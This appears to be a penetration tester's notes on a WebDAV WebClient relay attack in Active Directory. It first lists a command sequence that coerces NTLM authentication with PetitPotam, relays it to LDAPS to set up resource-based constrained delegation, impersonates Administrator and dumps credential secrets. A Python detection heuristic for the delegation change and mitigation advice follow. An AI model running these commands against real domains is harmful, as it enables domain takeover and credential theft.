WebDAV WebClient
Resource: https://www.bussink.net/rbcd-webclient-attack/
Prerequisites
LDAP signing is not enforced on the Domain Controller (default value)
LDAPS channel binding is not required on the Domain Controller (default value)
Normal domain users are able to add machine accounts (default MAQ value is 10)
Normal domain users are able to create DNS records (or local admin access to a device that has internal DNS, to set up a port forward)
Machines with WebClient enabled
Check if WebClients are enabled
nxc smb scope.txt -d '<DOMAIN-FQDN>' -u '<USERNAME>' -p '<PASSWORD>' -M webdav
Add a DNS record if DNS resolution is not active
python3 dnstool.py -u '<DOMAIN-FQDN>\<USERNAME>' -p '<PASSWORD>' -a add -r <NS-RECORD-NAME> -d <ATTACKER-IP> <DC-IP>
Set up NTLM relay
sudo impacket-ntlmrelayx -t ldaps://<DC-IP> --http-port 8080 --delegate-access
Coerce authentication
python3 PetitPotam.py -d '<DOMAIN-FQDN>' -u '<USERNAME>' -p '<PASSWORD>' '<DNS-RECORD>@8080/a' <WEBCLIENT-ENABLED-HOST-IP>
Create Kerberos ticket
impacket-getST -spn CIFS/<COMPUTER-NAME>.<DOMAIN-FQDN> <DOMAIN-FQDN>/<COMPUTER-USERNAME>\$ -dc-ip <DC-IP> -impersonate Administrator
Dump secrets
export KRB5CCNAME=Administrator.ccache
impacket-secretsdump -k <COMPUTER-NAME>.<DOMAIN-FQDN>
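Detection side of the relay and delegate-access steps above, as an added example that is not part of the original notes or of any tool named in them: a heuristic that flags a computer account adding msDS-AllowedToActOnBehalfOfOtherIdentity to its own object (Security event 5136) and raises severity when the same machine identity also created a computer account (event 4741) close in time. Assumptions: Directory Service Changes auditing and a SACL on computer objects are in place, the event records below are constructed, and the function names and the 10-minute window are hypothetical.

```python
from datetime import datetime, timedelta

RBCD_ATTR = "msds-allowedtoactonbehalfofotheridentity"
VALUE_ADDED = "%%14674"          # 5136 OperationType: value added
WINDOW = timedelta(minutes=10)   # assumed correlation window

# Constructed sample events; field names follow Security events 4741 and 5136.
DN = "CN={},CN=Computers,DC=corp,DC=example"
EVENTS = [
    {"id": 4741, "time": "2024-05-01T10:00:05", "SubjectUserName": "WS01$",
     "TargetUserName": "DESKTOP-A1B2C3$"},
    {"id": 5136, "time": "2024-05-01T10:00:06", "SubjectUserName": "WS01$",
     "ObjectDN": DN.format("WS01"), "OperationType": VALUE_ADDED,
     "AttributeLDAPDisplayName": "msDS-AllowedToActOnBehalfOfOtherIdentity"},
    # Benign: an administrator configures delegation on a server.
    {"id": 5136, "time": "2024-05-01T11:00:00", "SubjectUserName": "adm.alice",
     "ObjectDN": DN.format("SQL01"), "OperationType": VALUE_ADDED,
     "AttributeLDAPDisplayName": "msDS-AllowedToActOnBehalfOfOtherIdentity"},
    # Benign: helpdesk joins a workstation to the domain.
    {"id": 4741, "time": "2024-05-01T12:00:00", "SubjectUserName": "helpdesk1",
     "TargetUserName": "WS02$"},
]

def first_rdn(dn):
    """Value of the leftmost RDN, e.g. 'WS01' from 'CN=WS01,CN=Computers,...'."""
    return dn.split(",", 1)[0].partition("=")[2]

def find_rbcd_self_writes(events, window=WINDOW):
    """Alert when a computer account adds the RBCD attribute to its own object."""
    ts = lambda e: datetime.fromisoformat(e["time"])
    alerts = []
    for e in events:
        subj = e["SubjectUserName"].lower()
        if (e["id"] != 5136 or e.get("OperationType") != VALUE_ADDED
                or e.get("AttributeLDAPDisplayName", "").lower() != RBCD_ATTR
                or not subj.endswith("$")
                or first_rdn(e["ObjectDN"]).lower() != subj[:-1]):
            continue
        # Machine accounts created by the same computer identity near the write.
        new = [c["TargetUserName"] for c in events
               if c["id"] == 4741 and c["SubjectUserName"].lower() == subj
               and abs(ts(c) - ts(e)) <= window]
        alerts.append({"host": e["SubjectUserName"], "time": e["time"],
                       "new_accounts": new,
                       "severity": "high" if new else "medium"})
    return alerts

if __name__ == "__main__":
    for alert in find_rbcd_self_writes(EVENTS):
        print(alert)
```

Closing any one of the prerequisites listed at the top (enforcing LDAP signing and channel binding, setting the machine account quota to 0, disabling WebClient where unused) breaks the chain this rule watches for.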